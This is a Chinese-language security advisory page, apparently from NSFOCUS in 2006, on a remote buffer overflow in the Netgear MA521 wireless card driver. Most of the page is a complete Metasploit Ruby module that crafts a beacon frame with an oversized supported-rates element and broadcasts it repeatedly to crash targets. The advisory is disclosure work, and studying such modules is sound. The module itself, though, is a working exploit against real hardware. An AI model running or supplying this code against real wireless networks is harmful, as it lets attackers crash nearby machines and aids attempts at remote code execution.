首页 -> 安全研究
安全研究
安全漏洞
NetGear MA521无线驱动超长Rates溢出漏洞
发布日期:2006-11-18
更新日期:2006-11-20
受影响系统:
Netgear MA521描述:
BUGTRAQ ID: 21175
NetGear MA521是一款802.11b无线PC网卡。
NetGear MA521的驱动程序在处理畸形帧时存在漏洞,远程攻击可能利用此漏洞在用户机器上执行任意指令。
如果在积极扫描模式下接收到了畸形帧(信标或探测响应)的话,MA521的MA521nd5.SYS驱动就会试图写入攻击者所控制的内存位置。远程攻击者可以通过发送有无效rates信息单元的报文来触发缓冲区溢出,导致执行任意代码。
<*来源:Laurent Butti (laurent.butti@orange-ftgroup.com)
H D Moore (hdm@metasploit.com)
链接:http://projects.info-pull.com/mokb/MOKB-18-11-2006.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
module Msf
class Auxiliary::Dos::Wireless::Netgear_MA521_Rates < Msf::Auxiliary
include Exploit::Lorcon
def initialize(info = {})
super(update_info(info,
'Name' => 'NetGear MA521 Wireless Driver Long Rates Overflow',
'Description' => %q{
This module exploits a buffer overflow in the NetGear MA521 wireless device
driver under Windows XP. When a specific malformed frame (beacon or probe response)
is received by the wireless interface under active scanning mode, the MA521nd5.SYS
driver attempts to write to an attacker-controlled memory location. The vulnerability
is triggered by an invalid supported rates information element.
This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a
NetGear MA521 PCMCIA adapter. A remote code execution module is also in development.
This module depends on the Lorcon library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon documentation
(external/ruby-lorcon/README) for more information.
},
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://projects.info-pull.com/mokb/MOKB-18-11-2006.html'],
['URL', 'ftp://downloads.netgear.com/files/ma521_1_2.zip']
]
))
register_options(
[
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF'])
], self.class)
end
def run
open_wifi
stime = Time.now.to_i
rtime = datastore['RUNTIME'].to_i
count = 0
print_status("Creating malicious beacon frame...")
frame = create_beacon()
print_status("Sending malicious beacon frames for #{datastore['RUNTIME']} seconds...")
while (stime + rtime > Time.now.to_i)
wifi.write(frame)
select(nil, nil, nil, 0.10) if (count % 100 == 0)
count += 1
end
print_status("Completed sending #{count} beacons.")
end
def create_beacon
ssid = Rex::Text.rand_text(6)
bssid = Rex::Text.rand_text(6)
channel = datastore['CHANNEL'].to_i
seq = [rand(255)].pack('n')
frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x01\x00" + # capabilities
# ssid IE
"\x00" + ssid.length.chr + ssid +
# supported rates IE overflow
"\x01" + "\xFF" + ("\x41" * 255) +
# channel IE
"\x03" + "\x01" + channel.chr
return frame
end
end
end
建议:
厂商补丁:
Netgear
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.netgear.com/
浏览次数:3640
严重程度:0(网友投票)
绿盟科技给您安全的保障